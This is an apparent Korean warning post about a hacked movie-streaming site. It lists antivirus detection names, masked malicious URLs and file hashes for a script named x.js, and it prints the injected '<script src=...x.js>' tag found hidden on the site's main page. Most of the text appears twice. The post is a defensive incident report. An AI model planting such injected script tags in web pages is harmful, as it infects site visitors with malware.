무비X지 이용하시는 분들은 자제하시기 바랍니다.
몇일전 부터 계속 해킹을 당하고 있으며, 악성코드가 심어져 있습니다.
5월 2일자
HTML:IFrame-DQ [Trj] "http://www.*****.com.tw/ytfl.htm"
VBS:Obfuscated-gen [Trj] "http://www.*****.com.tw/16.js"
5월3일자
HTML:Script-inf "http://www.*****.com/topmain.php"
VBS:Obfuscated-gen [Trj] "http://www.*****.com.tw/x.js"
x.js 파일을 살펴보시면..
아이프레임 태그로 "http://www.*****.com.tw/index.htm" 불러 옵니다.
x.js
MD5...: 913ae2e3c77546e4551e91b525269191
SHA1..: ea1441081e9885a5c7c3c9f498bdb6f674076b7b
SHA256: 6c5da550d7f4e34fa392fbb799dd5f4202dca3acc1fc79f1343b9534706eb70c
SHA512: faa052efdfffdcc39c7e8563a7bb0c21ecc4940b682cb7d768a57429db555388
b96a3cf0ba57f46c8eea535509393a43fb0e85de12b41e1d574698327dcb2a23
ssdeep: 3:yLRmcpZUOAoRRN4ZJS4STLPDm0Cjf:yL/pZbAo3Nuc4WbDFCr
PEiD..: -
TrID..: File type identification
file seems to be plain text/ASCII (0.0%)
PEInfo: -
PDFiD.: -
RDS...: NSRL Reference Data Set
아래 이미지에 붉은색 박스를 보시면 아시겠지만,
현재 메인페이지에
숨겨져 있습니다.
현재 시간 오후 9시 35분 정도 됐는데..
지금은 제거 된거 같네요...
추가) Fedora님께서 자세히 분석해 놓으셨습니다.
H.exe 악성코드 분석 - http://fedorame.blogspot.com/2009/05/blog-post.html
몇일전 부터 계속 해킹을 당하고 있으며, 악성코드가 심어져 있습니다.
5월 2일자
HTML:IFrame-DQ [Trj] "http://www.*****.com.tw/ytfl.htm"
VBS:Obfuscated-gen [Trj] "http://www.*****.com.tw/16.js"
5월3일자
HTML:Script-inf "http://www.*****.com/topmain.php"
VBS:Obfuscated-gen [Trj] "http://www.*****.com.tw/x.js"
x.js 파일을 살펴보시면..
아이프레임 태그로 "http://www.*****.com.tw/index.htm" 불러 옵니다.
x.js
MD5...: 913ae2e3c77546e4551e91b525269191
SHA1..: ea1441081e9885a5c7c3c9f498bdb6f674076b7b
SHA256: 6c5da550d7f4e34fa392fbb799dd5f4202dca3acc1fc79f1343b9534706eb70c
SHA512: faa052efdfffdcc39c7e8563a7bb0c21ecc4940b682cb7d768a57429db555388
b96a3cf0ba57f46c8eea535509393a43fb0e85de12b41e1d574698327dcb2a23
ssdeep: 3:yLRmcpZUOAoRRN4ZJS4STLPDm0Cjf:yL/pZbAo3Nuc4WbDFCr
PEiD..: -
TrID..: File type identification
file seems to be plain text/ASCII (0.0%)
PEInfo: -
PDFiD.: -
RDS...: NSRL Reference Data Set
아래 이미지에 붉은색 박스를 보시면 아시겠지만,
현재 메인페이지에
<script src=http://www.*****.com.tw/x.js></script>
숨겨져 있습니다.
현재 시간 오후 9시 35분 정도 됐는데..
지금은 제거 된거 같네요...
추가) Fedora님께서 자세히 분석해 놓으셨습니다.
H.exe 악성코드 분석 - http://fedorame.blogspot.com/2009/05/blog-post.html
